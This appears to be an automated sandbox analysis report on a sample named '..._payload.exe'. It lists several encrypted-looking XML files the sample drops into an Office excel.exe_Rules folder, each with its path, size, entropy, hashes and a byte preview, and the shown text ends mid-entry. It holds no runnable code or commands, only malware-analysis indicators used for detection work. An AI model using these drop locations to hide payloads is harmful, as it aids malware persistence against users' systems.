                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                      Entropy (8bit):7.728343120252956
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:2rt2Pgs6pyeCjYOQMB5m4w9K1cL6OV2bD:2x2PIy93Qj4wfuZD
                                                                                                                                                                      MD5:A5C0D164CDAC49BA4EC1374BB023CDEA
                                                                                                                                                                      SHA1:D2005BDF04014F9F052A6F74A06B6BB5605DF6EE
                                                                                                                                                                      SHA-256:F024A74002A9D9F0EAAE064B9E8D6CCEF3DCAE9C5C2A4549724A3327850FD06C
                                                                                                                                                                      SHA-512:4B5D93EE575B65A5FAF4CDBA51A7C0A8F76B8DDC85089AC2D674BDA450ADB3AD8D5492E4B886C13CD6D1C8968ED4B1E9BCFFC92F078614FDAA7FDA307660C8EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml+..>Q^..Yl...Sx...2.{.zjX...j...{...R\..j..@y~o........H.p$.J....y...g4.. mm ....#.t.@xL.cX.. `}.+...[j.9....!2..'V.Q.V..3y..*...;....U...T~...NBbA..6.1...;#...,8*....%dD........C...=5..lh......K.`.G...e./.....vV.....<R.H..U=...~J.N..H.y.L..kf..2X..2..|......Fx...W..*......5x.Anw".!...^\...;c.....OC..@)..s......8..ASW..=....}.&G.B.#...Os.Fj.+5/..j....T..t{..6%O. ...S+1..4.@S:.+(&<..h......-..;...ZwE.......KEm.UV1v....X....."t.z....z~..@Ug*.a.l...q5..Z....#Wan......A.K.>h&.'..VY..dv..YX.:...hq.}.......M..7W.....jwQ.~...Z.h.4...7b.&._.'M..z.......$...~......L.........../..+.p.....j_..~.C?.r....x..........%......u@R."..IzfS.Yu'..cS.......m.zW*..Dd...*Ft.R..l.0msJ..D2......./ZE.%y.D/C...{K-!.c.h/..Z.Q.....8.#.m.UmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270018v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):956
                                                                                                                                                                      Entropy (8bit):7.798156196141821
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:FD8ukKt43eMwsWV+we87EqbV9DGn2OvevNOpa2V2bD:FwV1f5u+weVqZ9oPvsNOLuD
                                                                                                                                                                      MD5:B2EFB655485F2E83615D630A5950F625
                                                                                                                                                                      SHA1:5C66ADE3F290634CF773A05A3721B6C94FFE5DB3
                                                                                                                                                                      SHA-256:A57B9CBCA60D91CE0643A19250A58A0F2524C82C18164DF2542C528B987AB953
                                                                                                                                                                      SHA-512:9B201ED93EE14C02491ECE9ACE060003EFB6D5D62EAC156961B369C5E698A932E92F1868A8FF8166D64050B40C5343E59592A687890476F34F10A64D95A236C7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlQe..8..rkr....\..FM.%..4.._.A...."....cc. +.....1$.Z....PX..rK.?.L.My.9.....s.;..B)wL.....U.\p.E.w("&R.]"p..(OZ.......G.(.R..M......XO...:..[ML........u...OH..q....}..D.k.XT.Gi.Q`/I{X.BQ..Ge;.....P...".H..E....t....&..^.3....q.~.a.V...z.\^..........KX..#...F.u../o\.......O.'.T......U....i.E.X...|z.... ..P....e...*.1B'.....!.&..c~...:..2..W|....e....}v&..G...t...?Ek..../.@D.2_s.Em.N..~....q...#.Q.i..(.6.1....#.t<oN#*.Y4.g..<..QM.Dc..5Jb..b.W.......'..qd....}.MX..p.#.3.Y).,..`p@.B...f.k.%....a.....{c.W.=J..`>.[..;o.T~....zP..S..r.,.Q*......+.qQ..^l.c.....<...T......;...."Sz.......{..d...G.....D..9..U>d...=Z...g.....J.....}bOJ..5.C.........b..h.|".l......\....f..D.8.'.(..T.V.z...w..U.$..7?....#...N.....P.....0..B....>X....w....GHy.L.B....g#]...e.^.qP.X.....:.\...|..>....r..S.t.Jf./TGR.v.Y...#.."..k..Hq..V..MUM,.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270019v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1135
                                                                                                                                                                      Entropy (8bit):7.786512002581747
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ziPfBSO+z4Hk2MFITHQbMhD1TSU5mMhP5+3U7yU64tQmZve2bD:uX0O+UHeaiewE7RdC+FD
                                                                                                                                                                      MD5:4E90EC610FD5004630DC9CDFD2F3B857
                                                                                                                                                                      SHA1:49CD82C5362A506B1F76DB3BB3A949D93D2E0270
                                                                                                                                                                      SHA-256:400AF97C3C4AC2562A86B97EAC79FB721697C54433BA2A7086C80C731816874B
                                                                                                                                                                      SHA-512:37B734ED895DF98992F7704C2F056412DB391FD7278E0B75B1B36572FDA3D725690EC0B84BC106DD5DF4D6533F3C70A345DF2B5A4B344D6F896BBFC5BE459968
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.057..T.a......7..W..|...|H..f.4.H.248.....i....+S.ns;....$.C..%..8.P@.%_.h..*fH.(...DE......t.....x.AD!..m..:..a6..........E.l..>K..!.G..Z..s...F.X..TC{.43}...K(.W..).....H..Y:1?s..{....e.0..V%@.H...M#xl.8tT.{.b..........R.>.....L.f..X.O..P...f..Ii.%.F9t..i.k..^..t.M%.+i.o*..q.J...#.......i.i.....w=.......9...w.F...>.{iG......Wj$..y.4T...A..$....<F.|..3+............rW.E..Oz.19. .././(..-._o.wH...W.eH..#.Q4..O.^..0....F%v.V6.....9... .tF.b_..R<..BQB.L......4.....`e.6.t.z.0k........f,c...X.......{..1?......,.<.i.H4..!...V..B;....>.I.`qCNO.g..J&......q.Q.&...<l=._.M...<j....:.dP*..~1i.ua.T!esz..&.P.@{.....g..vuiT..w.v..W.h.<.S..-.S..yFi..eF..c.....O_|.;L......6._.g.@>.-.....H8G..GF.w.U..D].\>...Br.C.oW.. .0 .[1..W.E.....i.m%..&.[.i..mQ....J.../...F....<VRv.W.D=X h.........^..L...In$....L9.%r....i.......)X$..D..5..........M.............t.gH{q..........=#..i..I.s..Pf..3b.b....p....q6..,.t.o.....6Y..$AO..8.....R.V...$.=......0

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule310000v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1869
                                                                                                                                                                      Entropy (8bit):7.896828063250072
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:egW/aZ+b6+ji8wAEtMlFxDV2EMxouzoOusA0dFG9xB1Y9KmpdzzBD:eDb6qipy72nGuzoHsTG9xzY9KcBzp
                                                                                                                                                                      MD5:8A6641B8527AEE631F56A2D87D1B5548
                                                                                                                                                                      SHA1:2A73EA54BC894F191BBB39583C853DC22FC331F6
                                                                                                                                                                      SHA-256:8ECC3CAED338EE07398EDF18BFB876FB10D3046947B025A31CB8F19ACFA55D6C
                                                                                                                                                                      SHA-512:06BA29FCEA61DAC8015BBB7AFDF138D11FC6057B93A9264A9A7DB07D9CAB8F587494093342A5ECDFE728F268C4946F5F8D068D582D6EB4DFC15259AAE8ED888A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..\.....t..<.1.(.dg(?~..D.:..."....\..].p.!..Pm.f.....*...g.XL..t..)......H...9..<K...z@..~.`.vLo...2qs.)f.,.]b..cU..yD..J..@...u.W....4...'.3lg..........@.c..}.x.....`...43..@I.Z.E.M.....@w.......Q....".A....(....._y...}Nr:}.E."....b.. |YX.h.q[......~..6.Z(....x7b...G...u%..@...v...[7.;..G<....z..f.v=.w......gj..U.}@...f.8..WU..G..e.k..#...TJEI......4.......5.^.l.Nm.=....l.^..x........1..}.S.=.O....M(.~.......5.s".p....5.n......s...&..6...l....k....._..9u..c0fC.%@..5.}<.a..h..."......).4Vi.\..^E......\5.Q..]..~....r.Y...9..|.m..$-...E..O...x.z=.7...h.l.U..B..5j.q=..8_.m.NCA.8.\.``....<6....2..J..P....<...C../r.....5.Vi.....Q.}S#....6.X.@.-.~..Y.Q.C8\".E"..!".G.C@....:....!....-i9... .......V.I.......9.nD...9B.b.O9....=...Gv..n.I.......@...V..1.[T...#R..........^...1..]..]...\bT.ch{..x.=.|9V0"A?.`......k.yW<.BR=..E.{..k?).6j..x.q.U>...H^m....^%....9O9......{.L.nL...."k....b.9-..3.Mb.c.[.T.si4.%s.`...1.............KT5.....O......p.g..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320001v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1358
                                                                                                                                                                      Entropy (8bit):7.8379054704089315
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:tA8xHovp6C0QkRX721xCTMsgUZhsAa3BA6fNIC2PCJfS0Oj8/wn0ia42bD:t7xHovppPKXabkMsgUZuAa3Cvl+mcs0H
                                                                                                                                                                      MD5:FFAB66BD4357AC309B57E3B1F3A8E497
                                                                                                                                                                      SHA1:1A536C46FD6D4B96A167F33F77D360BFB2102D1E
                                                                                                                                                                      SHA-256:62A1EA4681526F821E9C1EAE0164F21ED6ACA1F2E44EC900E6A8134B9B83D156
                                                                                                                                                                      SHA-512:665DC4ED2A3F8C42ECC19952C1669E81074345C4A9C90CB8DAC007AFB7153499AF1023B8416F9F20BA3E80E0441FCC2E432E41A9864662C2902D8D666E8B5855
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...[..:6.8]...yi...'.:njg.......f.nX%$$P ..R<.g.`g.@ ..I).+9.A..N~y.R...=.$>G.H.w..my.3m..pR.@a>..%.|..M...[....A..n...3.pK.Md......l.t...tz]>).........mb...w^UT5.P...oR.(.6.!.#.p.#....Z/U...'Cu4O.....,..0...\F...x.G..q."F..G....W=.....v.(..-.t.b.g*..Nwg=...g(....|C...Nz...Kgxe.g. B|..^.G...d[..(=....L...K..D.7.8)..p.E...;......mj?4..:....>...S%.G).w.2q.m...i......=w.e.VL_..a....EX.9.N.x./u.0=....A...."..p..U....y.,.Ba.,.F...vC.,$w.N.n.U.J'c..g..I:/^...}.E.....09....??....l:6.B7$yD.,......L...$.)..).b.........'.._3..'.Od....M.i.|(.!>.....]..)._@........0..3.sE..?T.b.....KyG$U9........c>oH.......)T...+.j....;\*...-_..L.3~...cMP6...*..)...*..s.......f..e.....^.V..eb_...._...*..2......W6n.B.............rH.U.'..L-...pJ.>...)-;../.F@j....7h.......z.b.....I.~...8...!.C.{.SQ.....4.......jNJj.~.....Gt...=O..I.YV..~`...8xN...I....[3CZ..>.n.o..$...F.B|.g..+.gm...^..7....1........(A........@;/1`4).{..A..:&pZ..6w..y..yk.M.C>.....6......]B

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320002v5.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1892
                                                                                                                                                                      Entropy (8bit):7.903830388807079
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:xY2O9OpIByRYD0r9F0XPY8hgRxsmJFmHbD:xrgOhqArgXPUx63
                                                                                                                                                                      MD5:AEC99AE1CD3E8251E03B994108EF0EF3
                                                                                                                                                                      SHA1:F51E46CB433C389353801666FDA8C72D00725B73
                                                                                                                                                                      SHA-256:29D92833A1527383A68B06F39BADE3F7DFA08DB35334707550AC71878A1C5833
                                                                                                                                                                      SHA-512:75B9BDADDA1394CDCFCD5A5F96B7259E3EE7595917C22B243D10FE442FA1C1B2E53F70778C4EFAFEE281795F4A8FDD28AD831F2BD1467954A8CE62285A90A447
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmla..#.[p._G....U.h`.......c......vi....R+.w.Lm%'+.4)....TR5."...}2.....$.R........N.h.o6.y..k4.9a...qo.)}-.K.[uBvt..yH.......Jc.G../<].R.&.l."=4.......B.._.xx.I2.k$.d.n.s.n..X.,..i....Ip...:zt9..m.!>..;XeU.T..qB.=>59....#?.^..<.0..2..>?..G....J.....~..3.S...w"...'t...Q.0G0W..X.#...|....)..[`...t.X.I.)...a..+S.?:........... H5z1..n..D(....M...<...h>....b.).C....b......Wm......`.........#N.t].R..ZXU....d.%.cQ.tcJ.*V...c...4..<.-.....~..N..{...Ok.;..h>.......x`.G{&^......J3U..5...!....L.0;5^..Le..%./d.1].3j.y.....\.......Bc..V...,........^.?..C..)....e..)..:..Z.,G.Tmf...'f..a...7S.b....U..Pj.:R.5o.i@......\Tm.kN_....}..T[..%~.....zW#7../...r.d...Y...d.....UXW..B.3.4..D...-..s...!K..4. t..S .).._.f.t..T..t.......xr...;[.=@..BdE..... #..8>....8gy.1.....Y..).h........@..<......%.E.v5.<..j.....Z(....M.S"..=.._.v.v.C..-u..D}:.9.W.-.......V..RM,oWu-).lJf.%... ...+.JSL..g......S..Q..eyc\.!..[...sA\h...*u......zdi.k..'...@_Y.B.:..zV.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320003v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1144
                                                                                                                                                                      Entropy (8bit):7.831921146445297
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:mtkqO5573h0QMYKg/2uW7sLwNvDpb/SiRSttkoaW2bD:mtkqS5Th0ZgtW7sLKx/SiRStitdD
                                                                                                                                                                      MD5:1F4F8BFBD92334E93527B84555DBB3D8
                                                                                                                                                                      SHA1:1928C3BDB850FF87A4500DC9EF59FD0697F8AAAF
                                                                                                                                                                      SHA-256:72221193BE207D97BE6D1E9A036D10A7978D1E741349398C4F4A75A08502D0CA
                                                                                                                                                                      SHA-512:840FC13A7418F8FA554CCE10F2895E198A68DDFEF445985688D515019C23EAA2232CAA53AEBDFAD26E477CC5A90C096A91C7C227BEC3725610CDBCCE79005BC8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..CA..z..B..uLWJ.!ynQ.=\..t.0...V.o@.PO4.......`...{.x.....\f|w....?.i.w..*...........Ia.H..T|@K....:e....?.$...]}a..s_...c.M....B{..;.v.a.....}.#...?,...E..xdQ.m.....F-...l..}R.M.V......H.xQV.|.....;.....l3.y..!\$.z....D.{.o....S.rE..K...Y....#.....%.....`.........b...x...!kW^.L.N.SsA!.*U+Z......F.........._.S.xsQl..B9$.V7gi$J..9.....4z..&...#M...LV.!..[...!..Wk.+.....~.).. j..C?vT.a..X./,.#'0....^....E..-.C.l..Wf=...p( ...`...9q.P..m.a"&...AZP...o._..7...Y.h7.;.....Iy.|h.f}3N#s:.Cd..`z...D.m.I.j&8C+.....K.s.j.)N./dkD..Ez...z.c..M(.(.I.C.r.g..?s.lW.)T.....F....;o...I5..s)AA.1.........@....u..;..._.J....5...x....A....s.....b.X.)...i..1H~B.......{1.r.6.f..FA.^...".+d.#..".....Tw....8.....i....g..+."S...?rW-,.....R`.......I..M..D.........z.h.h.o..)..@33KL...f.*$..x.l..&J}XmY}gjH1..$..#.....n....8....x.G:..5.... tO....z...m!.3.2...=&.:.....k.e......~.......c.`..3.,7.o.....?.(...eQS.]..%L.4g.IP\+/N...R...G.T..B.D..D.m;..!

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320004v6.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1967
                                                                                                                                                                      Entropy (8bit):7.89485503264809
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:fr3lgwIcxSX15QJEgar51LZi/nHCSlWg8pwD:VIcxK4IXg/7ggt
                                                                                                                                                                      MD5:7578B6A29F31A92B32FD38E2E50A353B
                                                                                                                                                                      SHA1:ED7F26C3D5163AB64B21BBD22759AD2F3B65535A
                                                                                                                                                                      SHA-256:99B26A1C39C4640B0D53D99966CD542B93B286C6754FDF0A8F9942A2FEDEDEAB
                                                                                                                                                                      SHA-512:72076A2A6CC024CCDB8921BFECBD15356631E9745EF59CAA98EBEEC52AEF5C5CC46A7C16CB08610D4FF059A240A37799622E230D4DD55F2998401B7910540151
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....:.#.<.d..6.w.ww...{...5....f.).Y.PB..I...W.$.*.!.o......Q.&^.|k...2..K....r...}.JA..M.+.^.kK.g.......V....z.-.....@..@......6..!;V...%..8..T...B.h...dsl.<.3.%uG.f.....n.~"...D..."O..C.J,........Ez.!7&..7S).u.\...K.%..~+....o........z......"u...v..'....{..5.....>.\.;..x K*r..&g..Q?f!9..?.h....c..G.4..z..:e...:7...P....?.'F..g_QG.L......HQ.p.C.@....Lk~.s.....Q........G.R..%....\.....MT..q..\L...R1'......y..c|.l...n$...."....B....y. .d..-.f.D&:.....';..Ad.....~F...6.d.mp~(. .l.J.2.n.;.mP9..Z...7....-...O1.~hr..R.v...h.d.._-*....p]M..cg0\e.......".!..Xj.....ab#z.../hn..q.XUA.$3.U.E..k&.......6......,..,..i.$w..I.J. .).d..e..5r0. ......,A......nn=O..-MU.....V[.\<.A../.s..p08'v.g....QX.8..d$#^...._.&J<.sH~.T<$W../.2s..!g....T..L.~.\F..cE.}I.........^.yx. .9.........<...g.`I........#.N.K..gq1._.2..G.YB....:...o..e.`|.2..R..@..m...)........vo.w...:..y.(&..........0...3.2.........s.bK,..g`47.AQ..o8U....}A9...9.C...@...t....... [

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320005v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1427
                                                                                                                                                                      Entropy (8bit):7.859744124503569
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:AD7MNqcVNJpcPAzxcyNmKDKMFVi81TZsAOWKrpRtN9oanRb1kiI2bD:AHqAIcyTD2mZROWK9NmkVD
                                                                                                                                                                      MD5:17CF03DC8F0540ADA356B475D4303A9C
                                                                                                                                                                      SHA1:BD225D97DEE41B060EF8D8E0089CE6A2DF7A961B
                                                                                                                                                                      SHA-256:7F8D7A2F48F41867FDCFEF275F91018ADD21982C5EFB89737A1DF6A092638E70
                                                                                                                                                                      SHA-512:6B897A328E38C6F1863377F24619392F22EE003B062B724796954D4D642B55787DC82411214707BCAC3B66A593C2F92232D47845D46DB21D24C3B97B4F6CFD85
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml=..s...........>k..P....?..e....}.L.^......x.Rj.N...y.../.j..0...d..ac...[.Q.M$..l........g&#.6....3..e...C4..]...^."...<......;"....\...v.. 2Ah.9.[..)..h.6..n...]7..=...`7.......}{...W.58%.*.M. &.....!./Lb....CM?.JL.@(./..d..2~...Y.....m?0f.|......OB.|.JV/O.6..,.x.a.`.........C...P....iw..(?..1B...w#..~...0.Q.Kr.J.%.dUE....VYs........}...].a.P3.A.@..5O(1....!o..v+Y::EWD..+...?.9.(.0...o.B..!..9.........H.]r..Y...".%..N..#...D...i."...)|:..B.u.m9|..rwQ..N...t....V_....5.`U...^..Xu.PP...._....%.$.ub.G.h.`.H.*.36.........0..J...w.H.&#Ba.....$...v.nn..Al...&.....`....%A.....*..b.^..P.X^.>.U......4;N..1g..+E..p....BF!.S?=.D,..u..z.+..U.qA...x..KC&.be.#PZv..5..9.-'......l.q..C]..-.=k\.^N...g-.==..N.0.s1.......{~@.....C......F..5... .>y,..+...jG...k).4.....Y... ))........w...s....*...l.?4..(j.@w#..x .. ?p.=..j.K..#..$d...%ts3).b,9.f.k)......|...,..4..I.D`KTy..?.K....@.AA.@...S.Y..\..t.*\....8.t. #.[.u.........KL.&...Z.*&..p....xr.es.]4.b|8~I!Z

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320006v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1528
                                                                                                                                                                      Entropy (8bit):7.8705595658114635
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YW/kos4/0cqk9Z/crFIRVkSFDy5InYmc7AqjsdNgLKSwe6NzSCwokyXIor452bD:5bMcN8yRtDy5InY8xdfRNzSC4SD
                                                                                                                                                                      MD5:BA473A44643274DEC43C52208F87A7A7
                                                                                                                                                                      SHA1:090B56433D57A07E3669A4F7AA7B96267051EAED
                                                                                                                                                                      SHA-256:73184E55AA8DD735510701A538ADA8CB9E07A6535AE45D55EAD7A6D4546A974F
                                                                                                                                                                      SHA-512:5830E49FD53F0AD39E3D6CE682D65E9C3015E843767A56E3151A26E2DC604EFD3294468178F01892A2088FB44EC1A7E48A6EB603A6322FD068892935BE77A514
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmle*._.]+..u...^...G.....~@H..Y.pnl...........J...!.O.)u.}.....u....g..1*..%.K.Lp...0#D..}...j.W.R...&C7.,$..m.(.g&H$}cu.La..`...;.z.E...............I....)dT.?>.nKb......u}......rSX..7..X3=n..v...Dq.../.#.4.......*F..^...{....V0.T...0b.;K..l.Qn.m.."a.v.,m...MbM.R..S..k.<.. .v9x.....w.. .)..4.?... ..rX.r..@..q........v.T......`N.....1...o.v]].AhR.DK...^....s.#....g.|.P...F'm......L.$...Y...8..........I..qU.},M..V..nxo3...{WN..q..q.4...H.^..r..b.or...U.tz...A.7j]....;0N.....5:.?..>.......Py....^'....2"..{y............#.x.h..L.....QSWr.....7^..: ..0.<.<.i...0.K....mF.Q....T..Ow.:{.I..+.....A3....-.tJ...~...5.~.O..^......85...?.EF.)..!-p..7Ls]....d?..-m.....c'...n.R..k.......,.a....y...5....5..G...X....M-.Z......._..w=c.<..qm......e.5e...............E.m1..C.....4..q.......'a....!g..^'C...XH..._...t.?....].i%....$..q.od...q....K.H.......P....w..I..)......e.z.Q?...s[.B...[j=.......x......v.h.....s.....p.\>(....b.....J.K...w..NP.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320007v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1233
                                                                                                                                                                      Entropy (8bit):7.850567830383967
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:2+w1sMq7l5JjU/NCp+hXETQizU7fULQSnZVV2BbH/iziwlK2bD:OsMctiN02XETLoKQqZVmbH4xnD
                                                                                                                                                                      MD5:503F56984A79357DF4D8CD5ECDA2EE29
                                                                                                                                                                      SHA1:2C4B0058DF674E41D640E6A20C90FB7F648743AD
                                                                                                                                                                      SHA-256:22363E11A8C7D49F0C298F5BC93576018DA5D40CF6EA63134B54593D0D6DCAF3
                                                                                                                                                                      SHA-512:0263ADF01E9CC9427004EA2BE0AF884C5DA240246662369B197E8DE3D3EACCBC652992BE3C8660CF28628D52EEC58028A3DB2C89F30B8DEEE74591316949B9B9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.8..'..i.......B..J.)*...?s....j..g.U5...........u..y\.;s.*..J.f.y..vw.`..97....5..i.:.C.....iP...kvT^.j.y...XS...}.L......oQ.S..t...S>..E.PT.v[..B..V..r.IX..N&b[%{..[>.6P....3.........c[..@.9.]..l...J5.l.....+.L..7.=.....p..R.....K'.../K0...g..J.*.......B.....}M.oC)...+..@...Je.KM...4!f......;.....p_`....(.i-..60.....BF.E..........Ri...DD_.....D........."....pa.k..b.........3t....tY...n..0....VB..I;s!...1,.$.XS...?v8G[D$.+6. B...j.q...m......<....H....2e.F..F.H=...z]..2.y..v...5.ha..:..;u.$UZ...*..k@S..).c...l.........wi.=.Zr08%..l...S..g$6.....*h.m..J...YU.....^Q-..]>9,.0...}...B..m..G.H:..a..oK.I6.1.q ..-.....H...y.0d..l6."..J...tY...^..N.......'.s.d+H..5c.2..../Q....r..8Q....Ax...j&....`*c.(3........E2...l.X...k.TxL..y....F....*Ap.U....R..@r~.......Z"]T8`..R.!...0.v..n....o..?...Y.......>I...z.L..y.G=....k.t2...6..g..fY...1...).h^....h"k.\.?E...m#G.H.{.g.!.8..,.k..[..j.....S.e.6.7.+....Z..b,..G..O.. 8.g..m...G..>Y............U

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320009v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):866
                                                                                                                                                                      Entropy (8bit):7.796030057967599
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:iF6+SVizBA6HWvkB6S5uaitWH1pKsi6jsgoHv4nlM2bD:iOizet+6S1iEVpK2j249D
                                                                                                                                                                      MD5:EE02D9B1F26A31ACC325AC3CFC1F3165
                                                                                                                                                                      SHA1:4D3EF55F1F70B75FA6BEE7BD67FCFAA6FFB0B3F9
                                                                                                                                                                      SHA-256:A53969B0E41BA00873D74A50FED20B6C2038877C12FF173036BD27CC197B581E
                                                                                                                                                                      SHA-512:857B0B9F306D32B88D6F3A27D700378F4718BD26D78731615161B8BFA216841A40F7C07EA09E7D7185BED3A68985B8A4B5830120D6179883259BEECA78EE17C7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmli!V.R..;.9..a.@.@....G...ls.P..$Gb....9v)F#..."......V# .4....VU......../,..<1.@X....&T...k..1..s..p....r..c.i.2...&...q\s.........$RG....C...*.!.`N|.[|[.fQ...n...?fI.c.-K.e.p.Y.{...X#.A&#c9.~."....9_...>.hz......C^..._....L#YK8..(.U..p..vY5..?..............+/.. ..2.nd>.i.|.V.t..qa ......V...l..k...)....y....(.T.K....=....T[...W.4...=e. ...L.....w........R.....(..2..y...e.T...b.*f.]A...z<..xC ..~.oY?V..xV3......._.zvS..a0.r..U... ....e..uXH.Ag..P.*%..@..7F.+..........WPP|...(... w=y...5.r..h...5...]..o1.)...>..-@R...<.Z...F.+2.....h.....ou+..[..WxL...0)80.B...am...=<|.{K.S >U.g..m.....:.r..N#...x]...I.a.....+.$....h.lx.X....V.<....D....6..]..b..&.6I.6.60......w~....ktA2.,W......F.....$vV._..d~S...<..]p...!...P..?..Uw..^.J..0..O.g..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320016v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):901
                                                                                                                                                                      Entropy (8bit):7.750684794923374
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:AHL+7BmJ9jAVaDG83nFzTPqQUcdxBDe/i/siiux/2bD:AC7A9GaDG83FzTPIcZS/iWuxcD
                                                                                                                                                                      MD5:BAD4FE82B45BEBBC2CB33D08A26707EA
                                                                                                                                                                      SHA1:DD657BA13159292D0E6235860618110376D3F8CB
